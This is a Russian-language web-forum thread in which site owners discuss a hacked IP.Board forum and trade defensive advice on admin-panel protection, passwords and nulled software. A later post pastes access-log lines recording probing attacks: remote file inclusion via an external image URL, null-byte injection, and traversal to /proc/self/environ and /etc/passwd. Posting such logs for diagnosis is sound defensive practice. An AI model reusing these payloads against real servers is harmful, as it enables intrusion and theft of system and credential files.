Хакнули форум v3.1.4

[Morty 0]

Помогите пожалуйста защитится от хакинга.

Сосбтвенно адрес _http://help-icq.ru

[Креол 19]

Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswd

[Ph-A 395]

Помогите пожалуйста защитится от хакинга.

Использовать нормальный хостинг.

Не использовать нуленные программы. Если в непонятно откуда скачанных DLE или в IP.Board - е уже предусмотрен черный ход, то не защитится уже не чем.

Хуки скачивать только с официальных сайтов. Взломов через хуки еще не видел, но возможность вполне вероятная.

Ну естественно следить за обновлением используемых официальных программ.

 

И все.

 

Сломать нормальный пропаченный IP.Board очень сложно.

[Morty 0]

Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswd

Можно подробнее про .htpasswd?

[Ph-A 395]

Можно подробнее про .htpasswd

Auth - защита паролем - но мертвому припарка.

IPS после 2.3 про такую защиту забыла. Эффекта он нее не много.

 

Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ.

Если хостер дырявый, то .htpasswd и .htacces стираются без проблем.

Если взлом по ftp, то в АЦ заходов не бывает.

[Morty 0]

Auth - защита паролем - но мертвому припарка.

IPS после 2.3 про такую защиту забыла. Эффекта он нее не много.

 

Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ.

Если хостер дырявый, то .htpasswd и .htacces стираются без проблем.

Если взлом по ftp, то в АЦ заходов не бывает.

Вродебы там всё намного проще.

Я сейчас посмотрел логи входа в админку.

Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.

Так как мой акк был удалён, а его нет.

так что админку защитить я считаю имеет смысл.

[Ph-A 395]

Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.

Узнать пароль к htpasswd так же можно.

 

Так как мой акк был удалён, а его нет.

так что админку защитить я считаю имеет смысл.

Это ложное ощущение безопасности. Но лишняя защита не когда не бывает лишней.

 

Хотя проще, ограничить по минимуму количество людей с доступом в АЦ.

Пароль должен быть реально сложный.

У админа "логин" и "отображаемое имя" никогда не должны совпадать.

 

Я не использую htpasswd.

 

Так как мой акк был удалён, а его нет.

А смысл его при взломе, было оставлять? Чтобы восстановить было проще?

[Morty 0]

Всем спасибо.

Тему можно закрыть.

[Fisana 700]

Тема может пригодиться другим. Любая тема, где есть полезные советы.

[Morty 0]

Я ведь не сказал "тему можно удалить".

Тема ведь останется. А если у кого-то будет похожий вопрос то создаст новую...

[Ph-A 395]

И еще раз писать то же самое. Добрые ...

[Ritsuka 540]

Самое неприятное в любом взломе - это не факт самого взлома, а неизвестность:

- Кто и как именно взломал?

- Какой уровень доступа получил?

- С какой целью?

- Что именно и в каком количестве сделано?

- Не оставлено ли закладок "на будущее"?

 

Не найдя точные достоверные ответы, нельзя гарантировать, что взлом не повторится вновь. Если хотя бы на один из вопросов ответа нет - проводить полный аудит безопасности всего и вся, долго и основательно.

 

С сабжевого форума поржал.

[Ph-A 395]

проводить полный аудит безопасности

Смысл? Если с самого начала была высокая вероятность закладки.

[Ritsuka 540]

А я и не про этот форум пишу. Топикстартер тут и не появится более, скорее всего, он же свою проблему "решил". А там у него - да, конечно, проверять смысла нет. Судя по всему, пиратская говносборка какого-то очередного "хакера", изначально напичканная левыми модами и правками. Да и сам форум такой форум - такая тематика, такой контент. В одной из тех с половиной тем, кажется, сам админ выкладывает т.н. "пинч" - генератор трояна, ворующего cookies, причем выкладывает в бинарном виде. Думаю, вы все понимаете и относительно форума, и относительно методики "взлома"? Тут и "закаладки" не нужны, с такими админами))

[Bonov 13]

День добрый. Сегодня ночью посыпались ошибки следующего вида. Кто-то очень хотел найти какую-то уязвимость или что-то еще? Что за параметр "k"? Кто может прокомментировать? Спасибо.

 

Выдержки из лога. Всего было 108 строк. Полный лог во вложении.

 

 

log_id log_member log_date log_error log_error_code log_ip_address log_request_uri

18 0 1301948884 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

19 0 1301948886 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

20 0 1301948886 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

21 0 1301948888 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=/proc/self/environ

22 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

23 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

24 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

25 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

26 0 1301948890 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global&section=login&do=deleteCookies&k=/proc/self/environ%00

27 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/proc/self/environ

28 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

29 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

30 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00

31 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/proc/self/environ%00

32 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=lockStatus&status_id=30&k=/proc/self/environ

33 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=28&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?

 

...

 

123 0 1301948950 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd

124 0 1301948952 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=../../../../../../../../../../etc/passwd%00

125 0 1301948954 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile&section=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd%00

error_logs.rar